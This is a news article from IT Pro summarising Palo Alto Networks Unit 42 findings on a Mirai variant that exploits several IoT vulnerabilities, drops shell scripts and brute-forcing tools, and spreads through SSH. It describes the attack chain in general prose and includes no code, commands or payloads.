IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

New Mirai variant spotted targeting network devices

Palo Alto researchers claim exploit code for ten vulnerabilities have been used so far

Security researchers have discovered another Mirai variant that is targeting new Internet of Things (IoT) vulnerabilities. 

According to a blog post by researchers at Palo Alto Networks' Unit 42 Threat Intelligence Team, the attacks were first observed in mid-February. One IP address involved in the attack was updated to serve a Mirai variant leveraging CVE-2021-27561 and CVE-2021-27562, just hours after vulnerability details were published.

Earlier this month, the same samples were served from a third IP address, with the addition of an exploit leveraging CVE-2021-22502. At the tail end of last week, an exploit targeting CVE-2020-26919 was also incorporated into the samples.

The researchers said that the attacks are also using three other IoT vulnerabilities yet to be identified. These include two remote command execution vulnerabilities against unknown targets, and a vulnerability used by Moobot in the past.

In all of the attacks, hackers use the wget utility to download a shell script from the malware infrastructure. The shell script then downloads several Mirai binaries compiled for different architectures and executes these downloaded binaries one by one.

In addition to downloading Mirai, other malicious shell scripts have also been discovered.

“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” said Palo Alto Networks. 

After a successful attack, hackers have then downloaded other binaries to schedule jobs, make filter rules, carry out brute force attacks, or spread the malware.

Among these are lolol.sh, which downloads the “dark” binaries and schedules a job that would run every hour to rerun the lolol.sh script.

“However, the cron configuration is incorrect. This would have been an attempt to ensure the process is re-launched in case it crashes or is killed for some other reason,” said researchers.

Install.sh downloads GoLang v1.9.4 onto the target system and adds it to the system path. It also downloads “nbrute” binaries and a “combo.txt” file. Nbrute.[arch] mainly serves the purpose of brute-forcing the various credentials found in “combo.txt” while initiating an SSH connection with a certain IP.

Combo.txt is a plain text file containing numerous combinations of credentials (often default credentials on devices). Dark.[arch] is a binary based on the Mirai codebase, and mainly serves the purpose of propagation, or brute-forcing SSH connections using some hard-coded credentials in the binary.

"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researchers added.

Featured Resources

Accelerating AI modernisation with data infrastructure

Generate business value from your AI initiatives

Free Download

Recommendations for managing AI risks

Integrate your external AI tool findings into your broader security programs

Free Download

Modernise your legacy databases in the cloud

An introduction to cloud databases

Free Download

Powering through to innovation

IT agility drive digital transformation

Free Download

Recommended

Hackers could use new Wslink malware in highly targeted cyber attacks
malware

Hackers could use new Wslink malware in highly targeted cyber attacks

1 Nov 2021
FBI raids Chinese POS business following cyber attack claims
malware

FBI raids Chinese POS business following cyber attack claims

27 Oct 2021
Malware developers create malformed code signatures to avoid detection
malware

Malware developers create malformed code signatures to avoid detection

24 Sep 2021
New malware uses search engine ads to target pirate gamers
malware

New malware uses search engine ads to target pirate gamers

21 Jul 2021

Most Popular

Salaries for the least popular programming languages surge as much as 44%
Development

Salaries for the least popular programming languages surge as much as 44%

23 Jun 2022
The UK's best cities for tech workers in 2022
Business strategy

The UK's best cities for tech workers in 2022

24 Jun 2022
LockBit 2.0 ransomware disguised as PDFs distributed in email attacks
Security

LockBit 2.0 ransomware disguised as PDFs distributed in email attacks

27 Jun 2022